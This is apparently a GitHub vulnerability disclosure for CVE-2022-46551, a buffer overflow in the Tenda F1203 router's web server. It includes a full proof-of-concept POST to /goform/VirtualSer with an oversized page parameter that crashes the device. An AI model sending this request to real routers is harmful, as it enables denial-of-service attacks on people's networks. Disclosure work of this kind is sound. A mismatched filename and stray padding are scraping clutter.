aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa

CVE-2022-46551: CVE-vulns/saveParentControlInfo_time.md at main · Double-q1015/CVE-vulns

Tenda F1203 V2.0.1.6 was discovered to contain a buffer overflow via the page parameter at /goform/VirtualSer.

Tenda Router **F1203 V2.0.1.6** was discovered to contain a buffer overflow in the httpd module when handling /goform/VirtualSer request.

This vulnerability lies in the /goform/VirtualSer page，The details are shown below:

This POC can result in a Dos.

    POST /goform/VirtualSer HTTP/1.1
    Host: 192.168.204.143
    Cache-Control: max-age=0
    Upgrade-Insecure-Requests: 1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.134 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9
    Cookie: user=admin
    Connection: close
    Content-Length: 4106
    
    page=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa

Tag

#apple